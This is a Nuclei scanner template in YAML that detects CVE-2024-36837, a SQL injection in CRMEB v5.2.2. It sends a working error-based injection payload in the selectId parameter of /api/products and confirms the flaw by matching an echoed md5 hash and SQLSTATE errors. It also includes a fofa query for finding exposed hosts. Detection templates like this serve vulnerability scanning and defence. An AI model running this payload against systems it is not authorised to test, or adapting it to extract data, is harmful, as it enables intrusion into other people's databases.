nuclei-templates/http/cves/2024/CVE-2024-36837.yaml

46 lines
1.3 KiB
YAML

id: CVE-2024-36837
info:
name: CRMEB v.5.2.2 - SQL Injection
author: DhiyaneshDk
severity: high
description: |
SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file.
reference:
- https://github.com/phtcloud-dev/CVE-2024-36837
- https://nvd.nist.gov/vuln/detail/CVE-2024-36837
classification:
cpe: cpe:2.3:a:crmeb:crmeb:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: crmeb
product: crmeb
fofa-query: title="CRMEB"
tags: cve,cve2024,crmeb,sqli
variables:
num: "{{rand_int(9000000, 9999999)}}"
http:
- method: GET
path:
- "{{BaseURL}}/api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5({{num}})))),0x7e),3550)"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{md5(num)}}"
- "SQLSTATE"
condition: and
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 200
# digest: 4a0a00473045022100e150fa7d57347946cd30ddd727e30ff61230cf7f823a9ea1bf387fd223b330c6022012273bbb72f768af5396767d62406a097605bccc7f87871735732c56b87002d0:922c64590222798bb761d5b6d8e72950